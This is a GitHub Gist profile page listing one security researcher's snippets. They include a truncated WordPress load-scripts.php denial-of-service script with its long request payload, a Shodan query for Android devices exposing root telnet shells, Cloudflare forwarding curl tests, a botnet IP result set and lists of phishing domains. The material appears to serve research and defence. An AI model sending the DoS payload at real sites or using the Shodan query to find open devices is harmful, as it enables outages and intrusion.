Skip to content

Instantly share code, notes, and snippets.

View theMiddleBlue's full-sized avatar

theMiddle theMiddleBlue

350 followers · 50 following
View GitHub Profile
@theMiddleBlue
theMiddleBlue / dos.py
Created February 5, 2018 13:40
wordpress load-scripts dos
import requests, sys
payload = '/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-
@theMiddleBlue
theMiddleBlue / shodan.py
Created August 19, 2017 17:38
Shodan.io API
import httplib, urllib, re, sys, json, socket, struct
# python shodan.py 0
# ^ this is the page number
shodan = {
'apikey': '<your shodan API key>',
'query': r'"root%40"+"android"+port%3A23',
}
@theMiddleBlue
theMiddleBlue / cfok.md
Created August 9, 2017 20:28
cloudflare forward ok 
theMiddlePro:~ root# curl -v --resolve corriere.it:80:104.27.143.145 'http://corriere.it/'
* Added corriere.it:80:104.27.143.145 to DNS cache
* Hostname corriere.it was found in DNS cache
*   Trying 104.27.143.145...
* TCP_NODELAY set
* Connected to corriere.it (104.27.143.145) port 80 (#0)
> GET / HTTP/1.1
> Host: corriere.it
> User-Agent: curl/7.54.0
@theMiddleBlue
theMiddleBlue / cfdenied.md
Last active August 9, 2017 20:25
cloudflare forwarding denied 
theMiddlePro:~ root# curl -k -v --resolve corriere.it:80:104.24.99.193 'http://corriere.it/'
* Added corriere.it:80:104.24.99.193 to DNS cache
* Hostname corriere.it was found in DNS cache
*   Trying 104.24.99.193...
* TCP_NODELAY set
* Connected to corriere.it (104.24.99.193) port 80 (#0)
> GET / HTTP/1.1
> Host: corriere.it
> User-Agent: curl/7.54.0
@theMiddleBlue
theMiddleBlue / botnet_list.json
Created August 4, 2017 11:16
Botnet 898 IP Address (elasticsearch result) - https://goo.gl/tJv56C
{
"took": 103,
"timed_out": false,
"_shards": {
"total": 304,
"successful": 304,
"failed": 0
},
"hits": {
"total": 898,
@theMiddleBlue
theMiddleBlue / italian_phishing_domain
Last active July 19, 2017 10:21
Italian phishing domain name
http://www.adsilazio.it
http://www.al-parco.it
http://www.aneurysm.it
http://www.anonimoitaliano.it
http://www.ardaland.it
http://www.ascdiromagna.it
http://www.battagliamontecassino.it
http://www.biellaintraprendere.it
http://www.cabarun.it
http://www.calzaturificiorenata.it
@theMiddleBlue
theMiddleBlue / global_phishing_domain
Created July 19, 2017 10:20
Global phishing domain name
http://www.123gouter.fr
http://www.50ansdecine.fr
http://www.abigaely-voyance.fr
http://www.accueil-funeraire.fr
http://www.ace-renov.fr
http://www.achterhoek.nu
http://www.active-health.nl
http://www.addam-31.fr
http://www.adevesoiree.fr
http://www.adhi.es